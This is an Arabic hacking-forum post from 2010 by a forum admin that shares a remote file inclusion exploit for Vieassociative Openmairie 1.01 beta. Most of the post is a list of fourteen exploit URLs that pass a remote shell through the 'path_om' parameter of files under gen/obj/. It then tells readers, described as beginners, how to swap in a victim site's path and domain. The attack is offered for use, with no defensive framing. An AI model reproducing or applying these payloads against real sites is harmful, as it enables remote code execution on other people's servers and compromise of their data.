ثغرة بتاريخ 2010-04-13 Vieassociative Openmairie 1.01 beta (RFI) Multiple File Include Vulnerability

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل

ثغرة بتاريخ 2010-04-13 Vieassociative Openmairie 1.01 beta (RFI) Multiple File Include Vulnerability

مُساهمة  MRAAAD في الثلاثاء سبتمبر 28, 2010 2:34 pm

سلام عليكم


الثغرة صدرت في موقع سكورتي بتاريخ 13-04-2010 وان شاء الله من يومنا هدا الى كل الايام الجاية بادن الله راح احاول انزل اجدد الثغرات بمعدل ثغرة يوميا

اما بعد نرجع لموضوعنا الاساسي الثغرة RFI/LFI- Multiple File Include Vulnerability-

شرح الاسم
RFI=Remote File Include

وانا راح اعمل شرح مختصرلهته الثغرة السهلة حتى لمبتدئين

لرفع السكريبت المصاب
https://adullact.net/frs/download.ph...e_1.01beta.zip
على ما اضن ان في السكريبت ملف ريد مي يعني اقراني بعربي او ملف يبين كيفية تتبيت السكريبت


اما الروابط استغلال التغرة


http://alghacking.com/[path]/gen/obj/association.class.php??path_om=Shell
او

http://alghacking.com/path/gen/obj/collectivite.class.php?path_om=Shell
او
http://alghacking.com/path/gen/obj/planning.class.php?path_om=Shell
او
http://alghacking.com/[path]/gen/obj/rubrique.class.php?path_om=Shell
او
http://alghacking.com/[path]/gen/obj/assurance.class.php?path_om=Shell
او
http://alghacking.com/[path]/gen/obj/cotisation.class.php?path_om=Shell
او
http://alghacking.com/[path]/gen/obj/profil.class.php?path_om=Shell
او
http://alghacking.com/[path]/gen/obj/utilisateur.class.php?path_om=Shell
او
http://alghacking.com/[path]/gen/obj/bureau.class.php?path_om=Shell
او
http://alghacking.com/[path]/gen/obj
/droit.class.php?path_om=Shell
او
http://alghacking.com/[path]/gen/obj/aquartier.class.php?path_om=Shell
او
http://alghacking.com/[path]/gen/obj/categorie.class.php?path_om=Shell
او
http://alghacking.com/[path]/gen/obj/fonction.class.php?path_om=Shell
او

http://alghacking.com/[path]/gen/obj/ressource.class.php?path_om=Shell


نشرح بعض العبارات المتغيرة

[path] هو اسم مجلد الدي يحوي او يتواجد فيه السكريبت

مثال وجدنا موقع www.alghaking.com/hacki/..../hacki_om
هون في متالنا كلمة او عبارة pathهيhackiاي اسم المجلد الدي يحوي السكريبت

ونعوض
اسم موقع alghacking.com بموقع المصاب
اضن ان الثغرة سهلة
avatar
MRAAAD
مدير
مدير

عدد المساهمات : 165
نقاط : 3155
السٌّمعَة : 0
تاريخ التسجيل : 28/09/2010
العمر : 26
الموقع : www.syriaa-hac.yoo7.com

http://www.syriaa-hac.yoo7.com

الرجوع الى أعلى الصفحة اذهب الى الأسفل

استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة

- مواضيع مماثلة

 
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى